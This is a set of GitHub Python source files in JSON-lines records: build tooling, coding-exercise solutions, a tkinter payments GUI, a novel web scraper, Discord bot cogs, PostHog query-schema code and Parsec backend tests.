append_filename('/a/b/c/release.zip', '_1.0') == '/a/b/c/release_1.0.zip'\n \"\"\"\n file_dir, file_name = os.path.split(file_path)\n if file_name.startswith('.'):\n return os.path.join(file_dir, f'.{file_name[1:]}{value}')\n elif file_name.endswith('.'):\n return os.path.join(file_dir, f'{file_name[:-1]}{value}.')\n elif '.' not in file_name:\n return os.path.join(file_dir, f'{file_name}{value}')\n\n parts = file_name.split('.')\n assert len(parts) >= 2\n ext = parts[-1]\n parts = parts[:-1]\n parts[-1] += str(value)\n return os.path.join(file_dir, '.'.join(parts + [ext]))\n\n\ndef make_release(jxc_version: str, repo_root: str, output_path: str, amal_core_path: str, amal_cpp_path: str):\n output_path = append_filename(output_path, f'_{jxc_version}')\n zip_base_dir = f'jxc_{jxc_version}'\n\n with zipfile.ZipFile(output_path, 'w', compression=zipfile.ZIP_DEFLATED, compresslevel=9) as zf:\n for inc_glob in INCLUDE_GLOBS:\n print(repr(inc_glob))\n for path in glob.glob(os.path.join(repo_root, inc_glob)):\n file_rel_path = os.path.join(zip_base_dir, os.path.relpath(path, repo_root))\n zf.write(path, file_rel_path)\n print('\\t', repr(path), ' --> ', repr(file_rel_path))\n\n print('amalgamated_core')\n for filename in os.listdir(amal_core_path):\n file_path = os.path.join(amal_core_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_only', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n print('amalgamated_cpp')\n for filename in os.listdir(amal_cpp_path):\n file_path = os.path.join(amal_cpp_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_and_cpp_lib', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--source', type=str, help='Repo root directory')\n parser.add_argument('--amalgamated-core', type=str, help='Path to the amalgamated core build')\n parser.add_argument('--amalgamated-cpp', type=str, help='Path to the amalgamated cpp build')\n parser.add_argument('--output', type=str, help='Output zip file path')\n args = parser.parse_args()\n\n repo_root: str = os.path.abspath(args.source)\n if not os.path.exists(repo_root):\n raise FileNotFoundError(repo_root)\n\n amal_core: str = os.path.abspath(args.amalgamated_core)\n if not os.path.exists(amal_core):\n raise FileNotFoundError(amal_core)\n\n amal_cpp: str = os.path.abspath(args.amalgamated_cpp)\n if not os.path.exists(amal_cpp):\n raise FileNotFoundError(amal_cpp)\n\n output_path: str = os.path.abspath(args.output)\n assert not output_path.endswith('/')\n output_path_parent = os.path.dirname(output_path)\n if not os.path.exists(output_path_parent):\n output_path_parent_parent = os.path.dirname(output_path_parent)\n if os.path.exists(output_path_parent_parent) and os.path.isdir(output_path_parent_parent):\n os.makedirs(output_path_parent, exist_ok=True)\n else:\n raise ValueError(f\"Output path parent directory {output_path_parent_parent} does not exist\")\n\n # read the release version from the repo\n jxc_version = subprocess.check_output([ sys.executable, os.path.join(repo_root, 'tools', 'version.py') ]).strip().decode('utf-8')\n assert len(jxc_version) > 0 and len(jxc_version.split('.')) == 3\n\n make_release(jxc_version, repo_root, output_path, amal_core, 
amal_cpp)\n","repo_name":"juddc/jxc","sub_path":"tools/make_release_archive.py","file_name":"make_release_archive.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"53"} +{"seq_id":"30617207413","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n \n # discard extra white space\n atoi_string = str.strip()\n \n INT_MAX = 2147483649\n INT_MIN = -(INT_MAX - 1)\n sign = [\"-\", \"+\"]\n \n result = \"\"\n \n for index, char in enumerate(list(atoi_string)):\n if index == 0:\n if char.isdigit() or char in sign:\n result += char\n else: \n return 0\n else:\n if char.isdigit():\n result += char\n else:\n break\n \n num = int(result) \n if num < INT_MIN or num > INT_MAX:\n return INT_MIN if num < 0 else INT_MAX\n \n return num\n\ns = Solution()\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"4193 with words\"))\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"42\"))","repo_name":"rakontuh/algorithms","sub_path":"Algorithms/Stanford/week-1/atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"17285293095","text":"# Importamos los módulos necesarios\nimport tkinter as tk\nfrom tkinter import *\nimport customtkinter\nfrom customtkinter import CTkEntry, CTkButton\nfrom ttkthemes import ThemedTk\nfrom tkinter import PhotoImage\nfrom PIL import ImageTk, Image\nimport customtkinter as ctk\nfrom menu_registro import *\nfrom funciones2 import *\nfrom menu_pagos import *\nfrom consulta import *\n#from funct import *\nfrom cobranza import*\n# Creamos una ventana principal\nroot = ctk.CTk()\n\nroot.title(\"LS Software\")\nroot.geometry(\"1366x768+1+1\")\n#title_label = Label(root, text=\"LS Software\")\n\nroot.config(background=\"gray21\")\n\n# Creamos un canvas con un color de fondo y sin bordes\ncanvas = tk.Canvas(root, width=1280, height=720, bg=\"gray21\",\n highlightthickness=0)\ncanvas.pack()\n\n# Cargamos una imagen desde un archivo\n#imagen = Image.open(\"image.png\")\n# La convertimos a un formato compatible con tkinter\nphoto = PhotoImage(file=\"image.png\")\n# Creamos una imagen sobre el canvas con la foto cargada\ncanvas_image = canvas.create_image(650, 270, image=photo, anchor=CENTER)\n\nwindow = root\n# creacion del entry\nentry = ctk.CTkEntry(window, width=285, height=38,\n fg_color=\"snow2\", text_color=\"black\",\n font=(\"arial\", 20), placeholder_text=\"ej: 18123456\",\n justify=\"center\")\n# aqui la ubicamos:\nentry.place(x=676, y=621, anchor=CENTER)\n\n#funciones para bottones\ndef agregar():\n cedula = entry.get()\n print(\"accion para registrar pago de mensualidad: \" + cedula)\n\ndef buscar():\n cedula = entry.get()\n print(\"accion para buscar estado de cuenta del representante: \"\n + cedula)\n\n#Boton de agregar para registrar pagos de mensualidades\n\nadd_button = CTkButton(window, text=\"Agregar\", font=(\"arial\", 16),\n anchor=CENTER, width=10, command=agregar)\nadd_button.place(x=685, y=657, anchor=CENTER)\n\n#buscar_button = busqueda con la CI para ver estado de cuenta del representante\nbuscar_button = CTkButton(window, text=\"Buscar\",\n font=(\"arial\", 16),\n width=10, height=37, command=buscar)\nbuscar_button.place(x=855, y=621, anchor=CENTER)\n\n# Crear una instancia de Menu\nmenu_bar = Menu(root, background=\"black\")\n# Asignar la barra de menú a la ventana\nroot.config(menu=menu_bar)\n\n# Crear un elemento de 
menú \"Archivo\"\narchivo_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"ARCHIVO\", font=(\"calibri\", 18),\n menu=archivo_menu)\n\narchivo_menu.add_command(label=\"Nuevo\", command=nuevo)\narchivo_menu.add_command(label=\"Abrir\",command=abrir )\narchivo_menu.add_command(label=\"Importar\", command=importar)\narchivo_menu.add_command(label=\"Exportar\", command=exportar)\narchivo_menu.add_separator()\narchivo_menu.add_command(label=\"Salir\", command=root.quit)\n\n# Agregar el elemento de menú \"Registro\" a la barra de menú\nregistro_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"REGISTRO\", menu=registro_menu)\n\nregistro_menu.add_command(label=\"Representante\", command=representante)\nregistro_menu.add_command(label=\"Alumno\", command=alumno)\nregistro_menu.add_command(label=\"opcion 3\", command=opcion)\n\n# construccion del menu PAGOS\npagos_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"PAGOS\", menu=pagos_menu)\n\npagos_menu.add_command(label=\"Inscripcion\",command=inscripcion)\n\npagos_menu.add_command(label=\"Mensualidad\",command=pago_mensualidad)\n\n\npagos_menu.add_command(label=\"Cierre Diario\", command=cierre)\npagos_menu.add_command(label=\"Facturas\")\n\n# Agregar el elemento \"CONSULTAS\" a la barra de menú\nconsultas_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\n#creating cascade\nmenu_bar.add_cascade(label=\"CONSULTAS\", menu=consultas_menu)\n#creating elements for cascade\nconsultas_menu.add_command(label=\"Info Representante\",command=consulta_representante)\nconsultas_menu.add_command(label=\"Info Alumnos\",command=consulta_alumnos)\n#CREAR SUB_MENU MOROSIDAD\nmorosidad_menu = Menu(consultas_menu, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmorosidad_menu.add_command(label=\"Por Alumno\",command=consulta_alumnos)\nmorosidad_menu.add_command(label=\"Por curso\",command=consulta_curso)\nmorosidad_menu.add_command(label=\"TOTAL\")\nconsultas_menu.add_cascade(label=\"MOROSIDAD\", menu=morosidad_menu)\nconsultas_menu.add_command(label=\"opcion 4\") #extra option\n\n# Agregar cuentas por cobrar\ncobranza_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"COBRANZA\", menu=cobranza_menu)\n\ncobranza_menu.add_command(label=\"Por Alumno\",command=cobranza_alumno)\ncobranza_menu.add_command(label=\"Por curso\",command=cobranza_curso)\ncobranza_menu.add_command(label=\"TOTAL\")\n\n# Iniciamos el bucle principal de la ventana\nroot.mainloop()","repo_name":"jossephtrump/ventanas","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33016458718","text":"# -*- coding= utf-8 -*-\n# @Time : 2021-04-15 8:40\n# @Author : baoguo\n# @File : Day6-小说爬虫实战.py\n# @Software : PyCharm\nimport urllib.request, urllib.error\nfrom bs4 import BeautifulSoup\nimport xlwt\nimport re\nimport sqlite3\nimport gzip\nfrom io import BytesIO\n\n'''\n 需求:小说爬取 \n url = \"http://www.biquku.la/0/421/\" \n 数据爬取出现UnicodeDecodeError: \n 'utf-8' codec can't decode byte 0x8b in position 1: invalid start byte错误\n 是因为Accept-Encoding: gzip, deflate \n 需要通过gzip、BytesIO进行解压缩\n '''\n\n\ndef main():\n url = \"http://www.biquku.la/0/421/\"\n getData(url)\n # 
askURL(url)\n\n\nPageUrl = re.compile(r'.*')\ntName = re.compile(r'
    (.*)
    ', re.S)\ntData = re.compile(r'
    (.*?)
    ')\n\n\ndef getData(url):\n list = getUrl(url)\n for i in range(len(list)):\n newUrl = \"\"\n newUrl = url + str(list[i])\n html = askURL(newUrl)\n btf = BeautifulSoup(html, \"html.parser\")\n for item in btf.find_all('div', class_='content_read'):\n item = str(item)\n tname = re.findall(tName, item)[0]\n tdata = re.findall(tData, item)\n with open(\"DouLuoDaLu/\" + tname + '.txt', 'w', encoding='utf-8') as f:\n for data in tdata:\n data = \"\".join(data.split())\n f.write(data.replace('
    ', '\\n').strip())\n print(\"%s 下载成功\" % tname)\n print(\"下载成功\")\n\n\ndef getUrl(url):\n urlList = []\n html = askURL(url)\n btf = BeautifulSoup(html, \"html.parser\")\n item = btf.find_all(id=\"list\")\n item = str(item)\n pageurl = re.findall(PageUrl, item)\n for i in pageurl:\n urlList.append(i)\n return urlList\n\n\ndef askURL(url):\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/89.0.4389.90 Safari/537.36 \"\n }\n req = urllib.request.Request(url, headers=head)\n html = \"\"\n try:\n resp = urllib.request.urlopen(req)\n html = resp.read()\n buff = BytesIO(html)\n f = gzip.GzipFile(fileobj=buff)\n html = f.read().decode(\"utf-8\")\n except Exception as result:\n print(result)\n return html\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"S180231891/PaChong","sub_path":"Day6-小说爬虫实战.py","file_name":"Day6-小说爬虫实战.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35346275786","text":"import pandas as pd\nimport sys, os\nfrom datetime import date, datetime\n\nif len(sys.argv) == 1:\n raw = [os.path.expanduser(\"~/hw.txt\")] #default for convenient school use \nelse:\n raw = sys.argv[1:]\n\ndef days_until(due):\n return (due - datetime.today()).days + 1\n\nanything = False\nfor f in raw:\n if os.path.isfile(f): #guard for file existence\n if os.stat(f).st_size != 0: #check if file is non-empty\n data = pd.read_csv(\n f,\n sep='|',\n skip_blank_lines=True,\n skipinitialspace=True,\n parse_dates=[1],\n names=['task', 'due date', 'required'])\n skip = False\n else:\n print(f\"{f} is empty!\")\n skip = True\n else:\n print(f\"{f} isn't a file!\")\n skip = True\n\n if not skip:\n for _, r in data.iterrows():\n task = r[0]\n required = r[2]\n due = datetime.strptime(r[1], \"%A %m/%d \")\n due = due.replace(year=date.today().year)\n until = days_until(due)\n\n if until<=required and until>0:\n print(f\"{until} day{'' if until==1 else 's'} until {task}({required} needed)\")\n anything = True\n elif until == 0:\n print(f\"{task} due today!\")\n anything = True\n elif until < 0:\n print(f\"{task} is {-until} day{'' if -until==1 else 's'} late!!\")\n anything = True\n\nif not anything:\n print(\"No due dates in range\")\n","repo_name":"fadedlamp42/py-duedate","sub_path":"duedate.py","file_name":"duedate.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4906319177","text":"import asyncio\n\nimport discord\nfrom discord.ext import commands\n\nfrom config import OFFICER_ROLE\nimport cogs.CONSTANTS as CONSTANTS\nfrom database.database import SQLCursor, SQLConnection\n\n\nclass ALBotMessageDeletionHandlers(commands.Cog, name='Message Deletion Handlers'):\n \"\"\" Functions for handling tracked messages \"\"\"\n\n def __init__(self, bot: commands.Bot, db):\n self.bot = bot\n self.db = db\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n \"\"\" Checks reactions and deletes tracked messages when necessary. 
\"\"\"\n if payload.user_id == self.bot.user.id:\n return\n if payload.emoji.name == CONSTANTS.REACTION_DELETE:\n is_tracked = False\n sender_uid = None\n with SQLCursor(self.db) as cur:\n cur.execute(\"SELECT messid, sender_uid FROM tracked_messages WHERE messid=?\", (payload.message_id,))\n row = cur.fetchone()\n if row:\n is_tracked = True\n sender_uid = row[1]\n\n if is_tracked:\n reacting_member = self.bot.get_guild(payload.guild_id).get_member(payload.user_id)\n can_delete = self.bot.get_channel(payload.channel_id).permissions_for(reacting_member).manage_messages\n if payload.user_id == sender_uid or can_delete:\n relevant_message = await self.bot.get_channel(payload.channel_id).fetch_message(payload.message_id)\n await relevant_message.delete()\n\n\nasync def track(message, author=None):\n \"\"\" Marks a message in the database so that it will be automatically\n deleted if the sender or an admin reacts with the 'trash' emoji\n \"\"\"\n await message.add_reaction(CONSTANTS.REACTION_DELETE)\n sql_db = SQLConnection()\n aid = 0\n if author:\n aid = author.id\n with SQLCursor(sql_db) as cur:\n cur.execute(\"INSERT INTO tracked_messages (messid, sender_uid, track_time) VALUES (?, ?, ?);\",\n (message.id, aid, message.created_at))\n\n\nclass ALBotFactorialHandler(commands.Cog, name='Factorial Handler'):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_message(self, msg):\n \"\"\"Checks message for factorial format using regex.\"\"\"\n if msg.author != self.bot.user:\n import re\n filtered_msg = re.findall('{(?:[0-9]|[1-8](?:[0-9]{1,2})?)!}', msg.content)\n if filtered_msg is not None:\n group_len = len(filtered_msg)\n factorial = 'Factorial: `{}! = {}`' if group_len == 1 else 'The following factorials were calculated ' \\\n 'as:```'\n import math\n if group_len > 1:\n for i in range(0, group_len):\n num = int((filtered_msg[i].split('!')[0])[1:])\n product = math.factorial(num)\n factorial += '\\n\\n{}! = {}'.format(num, product)\n await msg.channel.send(factorial + '```')\n elif group_len == 1:\n try:\n num = int((filtered_msg[0].split('!')[0])[1:])\n await msg.channel.send(factorial.format(num, math.factorial(num)))\n except discord.HTTPException:\n await msg.channel.send(\n 'Cannot post answer due to excessive character count! 
Maximum factorial allowed is `801!`.')\n\n\nclass ALBotMessageClear(commands.Cog, name='Message Clear'):\n \"\"\"Functions for handling message deletion in channels\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.has_role(OFFICER_ROLE)\n @commands.command()\n async def clear(self, ctx, a_number):\n # Checks if number is positive int\n if not a_number.isdigit() or not int(a_number) > 0:\n await ctx.channel.send(content=\"Please input a number larger than zero\")\n return\n\n # checks the message reaction to see if the user confirms or cancels the command and returns True or False\n # respectively\n async def confirms(self, ctx, user, bot_msg):\n while True:\n\n def check(reaction: discord.Reaction, adder: discord.User) -> bool:\n return adder == user and reaction.message.id == bot_msg.id\n\n reaction, adder = await self.bot.wait_for('reaction_add', timeout=30.0, check=check)\n\n if reaction.emoji == \"✅\":\n return True\n elif reaction.emoji == \"❌\":\n return False\n\n # checks user permissions to see if they can manage messages in the channel\n if self.bot.get_channel(ctx.channel.id).permissions_for(ctx.author).manage_messages:\n user = ctx.channel.last_message.author\n user_msg = ctx.channel.last_message\n\n # warns the user and confirms the clear command\n await ctx.channel.send(\n \"WARNING: You are about to delete {} messages, are you sure you want to do this?\".format(a_number))\n bot_msg = ctx.channel.last_message\n\n # adds reactions to the bot message\n reactions = [\"✅\", \"❌\"]\n for emoji in reactions:\n await bot_msg.add_reaction(emoji)\n\n # Waits 30s for a user reaction and continues only if they respond with ❌ or ✅\n try:\n cont = await confirms(self, ctx, user, bot_msg)\n except asyncio.TimeoutError:\n await bot_msg.delete()\n await ctx.channel.send('Clear command Timeout')\n return\n\n # Cancels the command and deletes the bot message\n if not cont:\n await bot_msg.delete()\n await ctx.channel.send(content='Clear command cancelled')\n return\n\n # deletes bot message, user msg, then loops through channel deleting messages\n await bot_msg.delete()\n await user_msg.delete()\n async for message in ctx.channel.history(limit=int(a_number)):\n if not message.pinned:\n await message.delete()\n await asyncio.sleep(0.4)\n await ctx.channel.send(content='@{} Successfully deleted {} messages'.format(ctx.author, int(a_number)))\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ALBotMessageDeletionHandlers(bot, SQLConnection()))\n bot.add_cog(ALBotFactorialHandler(bot))\n bot.add_cog(ALBotMessageClear(bot))\n","repo_name":"ufosc/albot-and-albota","sub_path":"cogs/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"37038404254","text":"def combinationSum(candidates,target):\n res = [];\n candidates.sort();\n dfs(0,target,candidates,[],res);\n return res;\ndef dfs(start,target,candidates,path,res):\n if target < 0:\n return;\n if target == 0:\n res.append(path);\n return;\n for i in range(start,len(candidates)):\n dfs(i, target-candidates[i],candidates,path+[candidates[i]],res);\n\n\nprint(combinationSum([2,3,6,7],7));\n","repo_name":"leneyi/crackAlgorithm","sub_path":"combinationSum.py","file_name":"combinationSum.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16460902185","text":"\"\"\"\r\n1)\r\nНаписать генератор нечётных 
чисел от 1 до n (включительно),\r\nиспользуя ключевое слово yield\r\n\"\"\"\r\nnum = int(input('Введите число:'))\r\ndef odd_nums(num):\r\n for num in range(1, num + 1, 2):\r\n yield num\r\n\r\nfor i in odd_nums(num):\r\n print(i)\r\n\r\n\r\n'''\r\n2\r\n* (вместо 1) Решить задачу генерации нечётных чисел от 1 до n (включительно),\r\nне используя ключевое слово yield.\r\n'''\r\n\r\nprint(*[num for num in range(1, int(input(\"Введите число:\")) + 1, 2)])\r\n\r\n\r\n","repo_name":"ImMarat/home_work_for_lesson_5","sub_path":"home_work_1_and_2_for_Lesson_5.py","file_name":"home_work_1_and_2_for_Lesson_5.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39510842369","text":"from typing import Dict, List\n\nfrom posthog.hogql.database.models import (\n Table,\n StringDatabaseField,\n DateTimeDatabaseField,\n IntegerDatabaseField,\n LazyJoin,\n FieldTraverser,\n DatabaseField,\n LazyTable,\n FieldOrTable,\n)\nfrom posthog.hogql.database.schema.person_distinct_ids import (\n PersonDistinctIdsTable,\n join_with_person_distinct_ids_table,\n)\nfrom posthog.schema import HogQLQueryModifiers\n\nSESSION_REPLAY_EVENTS_COMMON_FIELDS: Dict[str, FieldOrTable] = {\n \"session_id\": StringDatabaseField(name=\"session_id\"),\n \"team_id\": IntegerDatabaseField(name=\"team_id\"),\n \"distinct_id\": StringDatabaseField(name=\"distinct_id\"),\n \"min_first_timestamp\": DateTimeDatabaseField(name=\"min_first_timestamp\"),\n \"max_last_timestamp\": DateTimeDatabaseField(name=\"max_last_timestamp\"),\n \"first_url\": DatabaseField(name=\"first_url\"),\n \"click_count\": IntegerDatabaseField(name=\"click_count\"),\n \"keypress_count\": IntegerDatabaseField(name=\"keypress_count\"),\n \"mouse_activity_count\": IntegerDatabaseField(name=\"mouse_activity_count\"),\n \"active_milliseconds\": IntegerDatabaseField(name=\"active_milliseconds\"),\n \"console_log_count\": IntegerDatabaseField(name=\"console_log_count\"),\n \"console_warn_count\": IntegerDatabaseField(name=\"console_warn_count\"),\n \"console_error_count\": IntegerDatabaseField(name=\"console_error_count\"),\n \"size\": IntegerDatabaseField(name=\"size\"),\n \"event_count\": IntegerDatabaseField(name=\"event_count\"),\n \"message_count\": IntegerDatabaseField(name=\"message_count\"),\n \"pdi\": LazyJoin(\n from_field=\"distinct_id\",\n join_table=PersonDistinctIdsTable(),\n join_function=join_with_person_distinct_ids_table,\n ),\n \"person\": FieldTraverser(chain=[\"pdi\", \"person\"]),\n \"person_id\": FieldTraverser(chain=[\"pdi\", \"person_id\"]),\n}\n\n\nclass RawSessionReplayEventsTable(Table):\n fields: Dict[str, FieldOrTable] = {\n **SESSION_REPLAY_EVENTS_COMMON_FIELDS,\n \"min_first_timestamp\": DateTimeDatabaseField(name=\"min_first_timestamp\"),\n \"max_last_timestamp\": DateTimeDatabaseField(name=\"max_last_timestamp\"),\n \"first_url\": DatabaseField(name=\"first_url\"),\n }\n\n def avoid_asterisk_fields(self) -> List[str]:\n return [\"first_url\"]\n\n def to_printed_clickhouse(self, context):\n return \"session_replay_events\"\n\n def to_printed_hogql(self):\n return \"raw_session_replay_events\"\n\n\ndef select_from_session_replay_events_table(requested_fields: Dict[str, List[str]]):\n from posthog.hogql import ast\n\n table_name = \"raw_session_replay_events\"\n\n aggregate_fields = {\n \"start_time\": ast.Call(name=\"min\", args=[ast.Field(chain=[table_name, \"min_first_timestamp\"])]),\n \"end_time\": ast.Call(name=\"max\", 
args=[ast.Field(chain=[table_name, \"max_last_timestamp\"])]),\n \"first_url\": ast.Call(name=\"argMinMerge\", args=[ast.Field(chain=[table_name, \"first_url\"])]),\n \"click_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"click_count\"])]),\n \"keypress_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"keypress_count\"])]),\n \"mouse_activity_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"mouse_activity_count\"])]),\n \"active_milliseconds\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"active_milliseconds\"])]),\n \"console_log_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"console_log_count\"])]),\n \"console_warn_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"console_warn_count\"])]),\n \"console_error_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"console_error_count\"])]),\n \"distinct_id\": ast.Call(name=\"any\", args=[ast.Field(chain=[table_name, \"distinct_id\"])]),\n \"size\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"size\"])]),\n \"event_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"event_count\"])]),\n \"message_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"message_count\"])]),\n }\n\n select_fields: List[ast.Expr] = []\n group_by_fields: List[ast.Expr] = []\n\n for name, chain in requested_fields.items():\n if name in aggregate_fields:\n select_fields.append(ast.Alias(alias=name, expr=aggregate_fields[name]))\n else:\n select_fields.append(ast.Alias(alias=name, expr=ast.Field(chain=[table_name] + chain)))\n group_by_fields.append(ast.Field(chain=[table_name] + chain))\n\n return ast.SelectQuery(\n select=select_fields,\n select_from=ast.JoinExpr(table=ast.Field(chain=[table_name])),\n group_by=group_by_fields,\n )\n\n\nclass SessionReplayEventsTable(LazyTable):\n fields: Dict[str, FieldOrTable] = {\n **SESSION_REPLAY_EVENTS_COMMON_FIELDS,\n \"start_time\": DateTimeDatabaseField(name=\"start_time\"),\n \"end_time\": DateTimeDatabaseField(name=\"end_time\"),\n \"first_url\": StringDatabaseField(name=\"first_url\"),\n }\n\n def lazy_select(self, requested_fields: Dict[str, List[str]], modifiers: HogQLQueryModifiers):\n return select_from_session_replay_events_table(requested_fields)\n\n def to_printed_clickhouse(self, context):\n return \"session_replay_events\"\n\n def to_printed_hogql(self):\n return \"session_replay_events\"\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/database/schema/session_replay_events.py","file_name":"session_replay_events.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"5679306819","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHelper function to parse config files (without section headers).\n\"\"\"\n\nimport configparser\n\n\nCONFIG_PATH = 'config.cfg'\n\n\ndef get(key):\n try:\n with open(CONFIG_PATH, 'r') as f:\n config_string = '[DEFAULT]\\n' + f.read()\n config = configparser.ConfigParser()\n config.read_string(config_string)\n return config['DEFAULT'][key]\n except: return False\n return False\n","repo_name":"wottpal/Automated-Melanoma-Classification","sub_path":"helpers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73810302889","text":"from parsec.backend.backend_events import 
BackendEvent\nfrom parsec.event_bus import MetaEvent\nimport pytest\nimport trio\nfrom async_generator import asynccontextmanager\n\nfrom parsec.api.protocol import apiv1_user_invite_serializer, UserID\nfrom parsec.backend.user import PEER_EVENT_MAX_WAIT, UserInvitation\n\n\n@asynccontextmanager\nasync def user_invite(sock, **kwargs):\n reps = []\n await sock.send(apiv1_user_invite_serializer.req_dumps({\"cmd\": \"user_invite\", **kwargs}))\n yield reps\n raw_rep = await sock.recv()\n rep = apiv1_user_invite_serializer.rep_loads(raw_rep)\n reps.append(rep)\n\n\n@pytest.mark.trio\nasync def test_user_invite(monkeypatch, backend, apiv1_alice_backend_sock, alice, mallory):\n dummy_user_id = UserID(\"dummy\")\n await backend.user.create_user_invitation(\n alice.organization_id, UserInvitation(dummy_user_id, alice.device_id)\n )\n\n user_invitation_created = trio.Event()\n\n vanilla_create_user_invitation = backend.user.create_user_invitation\n\n async def _mocked_create_user_invitation(*args, **kwargs):\n ret = await vanilla_create_user_invitation(*args, **kwargs)\n user_invitation_created.set()\n return ret\n\n monkeypatch.setattr(backend.user, \"create_user_invitation\", _mocked_create_user_invitation)\n\n with trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep:\n\n # Wait for invitation to be created before fetching it !\n await user_invitation_created.wait()\n\n # No the user we are waiting for\n await backend.user.claim_user_invitation(\n alice.organization_id, dummy_user_id, b\"\"\n )\n\n await backend.user.claim_user_invitation(\n alice.organization_id, mallory.user_id, b\"\"\n )\n\n assert prep[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n\n\n@pytest.mark.trio\nasync def test_user_invite_already_exists(backend, apiv1_alice_backend_sock, alice, bob):\n with trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=bob.user_id) as prep:\n pass\n assert prep[0] == {\"status\": \"already_exists\", \"reason\": f\"User `{bob.user_id}` already exists\"}\n\n\n@pytest.mark.trio\nasync def test_user_invite_timeout(mock_clock, backend, apiv1_alice_backend_sock, alice, mallory):\n with backend.event_bus.listen() as spy:\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep:\n\n await spy.wait_with_timeout(\n MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED}\n )\n mock_clock.jump(PEER_EVENT_MAX_WAIT + 1)\n\n assert prep[0] == {\n \"status\": \"timeout\",\n \"reason\": \"Timeout while waiting for new user to be claimed.\",\n }\n\n\n@pytest.mark.trio\nasync def test_user_invite_not_admin(apiv1_bob_backend_sock, mallory):\n with trio.fail_after(1):\n async with user_invite(apiv1_bob_backend_sock, user_id=mallory.user_id) as prep:\n pass\n assert prep[0] == {\n \"status\": \"not_allowed\",\n \"reason\": \"Only allowed for user with ADMIN profile.\",\n }\n\n\n@pytest.mark.trio\nasync def test_concurrent_user_invite(\n backend, apiv1_alice_backend_sock, apiv1_adam_backend_sock, alice, adam, mallory\n):\n with backend.event_bus.listen() as spy, trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep1:\n\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n async with user_invite(apiv1_adam_backend_sock, user_id=mallory.user_id) as prep2:\n\n spy.clear()\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n\n backend.event_bus.send(\n 
